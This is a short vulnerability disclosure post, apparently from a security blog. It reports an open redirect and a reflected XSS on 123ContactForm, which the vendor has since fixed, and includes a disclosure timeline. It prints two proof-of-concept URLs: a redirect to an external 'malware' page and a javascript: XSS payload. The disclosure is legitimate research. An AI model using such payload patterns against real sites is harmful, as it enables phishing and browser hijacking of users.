Open Redirect and Reflected XSS on 123ContactForm

WS201516 – Open Redirect and Reflected XSS on 123ContactForm
by David Sopas @dsopas
www.websegura.net

Description:

123ContactForm is a service developed by a young enthusiastic team located in Timisoara, Romania, EU. Founded in 2008, 123ContactForm has become a worldwide top class online form and survey builder.

When visiting a client of 123contactform.com I noticed a strange request from their site.
What I found was a Open Redirect and XSS vulnerability that could be used by malicious users to forward victims to malicious sites, spread malware, phishing accounts and even hijack victims browsers.

Proof-of-concept:

Open Redirect
http://www.123contactform.com/jsform_intermediate.html?url=http://www.websegura.net/malware.htm&xdm_e=http%3A%2F%2Fwww.
cliente_123contactform.net&xdm_c=default6100&xdm_p=1

XSS
http://www.123contactform.com/jsform_intermediate.html?url=javascript:prompt(document.domain)&xdm_e=http%3A%2F%2Fwww.
cliente_123contactform.net&xdm_c=default6100&xdm_p=1

xss_123contactform

123ContactForm fixed this issue and put my name on their security acknowledgements list.

Timeline:

08 May 2015 – Sent the security issue to 123ContactForm
23 May 2015 – Reply from 123ContactForm telling that they are fixing it
26 Jun 2015 – 123ContactForm applied a fix
21 Jul 2015 – My name is added on their security acknowledgements list
22 Jul 2015 – Full disclosure

Achaste interessante? Partilha!